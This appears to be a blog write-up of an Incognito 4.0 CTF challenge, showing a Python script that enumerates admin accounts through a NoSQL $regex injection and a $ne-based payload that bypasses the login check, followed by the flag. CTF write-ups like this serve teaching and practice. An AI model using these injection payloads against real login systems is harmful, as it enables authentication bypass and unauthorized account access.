-
To summarize this CTF challenge, it could be solved by performing a NoSQL injection attack.
The challenge provided a login and registration feature, as well as a functionality to check the existence of an email and whether an account had admin privileges.
The ultimate goal of the challenge was to log in with an admin account, so I had to find an account with "isAdmin" set to true.
Payload
import string import requests url = "http://143.42.131.80:1337/checkUser?email[$regex]=^" def find_isAdmin_true(): payload = "" for i in string.printable: res = requests.get(url=url+i) if '{\"exists\":true,\"isAdmin\":true}' in res.text: payload = url+i print("[+] Payload : " + payload) break if __name__ == "__main__": find_isAdmin_true() # http://143.42.131.80:1337/checkUser?email[$regex]=^f
To find such an account, I attempted a NoSQL injection attack, and used a Python script to locate the accounts where "isAdmin" was true.
Exploit
email[$regex]=^f&password[$ne]=1
- This payload is a query that searches for emails starting with the letter "f" and having a password that is not 1, using regular expressions with the "^" symbol indicating the start of the string and "f" representing the letter "f". The "$ne" operator means "not equal".
By instructing to select all documents where the value of the "password" field is not 1, I made the value of the login query true,
thereby bypassing the login logic.
FLAG : ictf{m4ss_ass1gnm3nt_1s_d4ng3rou5_93ab21c8}
'CTF > Incognito 4.0' 카테고리의 다른 글
[Incognito 4.0] get flag2 (0) 2023.02.19 [Incognito 4.0] get flag 1 (0) 2023.02.19 댓글